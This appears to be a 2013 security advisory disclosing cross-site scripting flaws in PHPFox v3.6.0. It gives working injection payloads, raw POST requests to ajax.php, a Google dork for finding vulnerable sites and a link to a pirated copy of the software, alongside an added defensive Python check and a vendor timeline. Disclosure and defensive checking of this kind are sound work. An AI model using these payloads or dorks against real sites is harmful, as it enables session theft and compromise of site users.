------------------------------------------------------------
Exploit Title: PHPFox v3.6.0 (build6) Multiple Cross-Site Scripting vulnerabilities
------------------------------------------------------------
Author: #BHG Security Center
Date: Saturday, October 12, 2013
Vendor: http://www.phpfox.com
Software Link: http://dl.nuller.ir/PhpFox.Community.Edition.v3.6.0.Build.6.PHP.NULL-iND%5BNuLLeR.iR%5D.zip
Vulnerable Version(s): v3.6.0.Build.6 is vulnerable.
Tested Version: 3.6.0.Build.6
Vulnerability Type: Cross-Site Scripting
Google Dork: "Powered By PHPFox Version 3.6.0"?
Risk Level: High
Software Price: 299 $
Tested on: Windows, PHP 5.2
Vulnerability Video : http://www.youtube.com/watch?v=Yw7Wgr4LtGo&feature
-- Vulnerability discovered by: Net.Edit0r ( Dariush Nasirpour) - Email : Black.hat.tm@gmail.com
------------------------------------------------------------
== Proof of concept ==
------------------------------------------------------------
[-] Description :
[-] PoC 1.1: XSS code injection in the Join field:
1) XSS code: <script>alert(12)</script>
2) Encode to: <script>alert(12)</script>
3) Put it in the First name field at Sign Up
4) After login, hover your mouse over Recent Logins
5) You will see that the XSS code was successful
------------------------------------------------------------
Vulnerable File(s):
[+] ajax.php
Vulnerable Parameter(s):
[+] sId
[+] sInput
[+] title
[+] type
[-] PoC 2.2:
## URL encoded POST input ( sId & sInput ) was set to <script>alert(0)</script>
## Request
POST /upload/static/ajax.php HTTP/1.1
=undefined&core[ajax]=true&core[call]=captcha.reload&core[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]=0&core[security_token]=572157ee6d639d835e70475f46a6ef74&sId=[Inject XSS Code]&sInput=[Inject XSS Code]
[-] PoC 3.3:
## URL encoded POST input ( title & type ) was set to " onmouseover=prompt(951977) bad="
## Request
POST /upload/static/ajax.php HTTP/1.1
core[ajax]=true&core[call]=share.popup&core[security_token]=572157ee6d639d835e70475f46a6ef74&feed_id=1&height=300&is_feed_view=1&sharemodule=event&title=[Inject XSS Code]&type=[Inject XSS Code]&url=http%3A%2f%2fblack-hg.org%2findex.phpF%26width%3D550
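A defensive check for the two ajax.php requests above, as an added example (not part of the original advisory and not PHPFox code): it parses a form-encoded POST body, flags the advisory's parameters when they carry HTML breakout characters, and shows each value as it looks after HTML-encoding on output. The names audit_body, WATCHED and SAMPLES, the sample bodies and the TOKEN placeholder are constructed for illustration.

```python
import html
from urllib.parse import parse_qsl

# ajax calls and parameters named in the advisory (PoC 2.2 and PoC 3.3).
WATCHED = {
    "captcha.reload": ("sId", "sInput"),
    "share.popup": ("title", "type"),
}
# Characters that let a reflected value leave an HTML text or attribute context.
BREAKOUT = set("<>\"'")


def audit_body(body: str):
    """Return (call, param, raw value, HTML-encoded value) for every watched
    parameter in a form-encoded ajax.php POST body that contains breakout
    characters. Duplicate parameters are all inspected."""
    pairs = parse_qsl(body, keep_blank_values=True)
    call = dict(pairs).get("core[call]", "")  # last occurrence wins, as in PHP
    watched = WATCHED.get(call, ())
    return [
        (call, name, value, html.escape(value, quote=True))
        for name, value in pairs
        if name in watched and BREAKOUT & set(value)
    ]


# Constructed sample bodies; TOKEN is a placeholder, benign values are illustrative.
SAMPLES = [
    "core[ajax]=true&core[call]=captcha.reload&core[security_token]=TOKEN"
    "&sId=js_captcha&sInput=abc12",
    "core[ajax]=true&core[call]=captcha.reload&core[security_token]=TOKEN"
    "&sId=%3Cscript%3Ealert(0)%3C%2Fscript%3E&sInput=abc12",
    "core[ajax]=true&core[call]=share.popup&core[security_token]=TOKEN"
    "&feed_id=1&title=%22%20onmouseover%3Dprompt(951977)%20bad%3D%22&type=feed",
]

if __name__ == "__main__":
    for body in SAMPLES:
        for call, param, raw, safe in audit_body(body):
            print(f"{call} {param}: {raw!r} -> {safe!r}")
```

The character match is a log-review heuristic only; the encoded column shows what the response should contain once the application HTML-encodes these values, quotes included, at the point of reflection.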
------------------------------------------------------------
Timeline:
------------------------------------------------------------
Advisory Publication: September 18, 2013 [without technical details]
Vendor Notification: September 18, 2013
Public Disclosure: October 12, 2013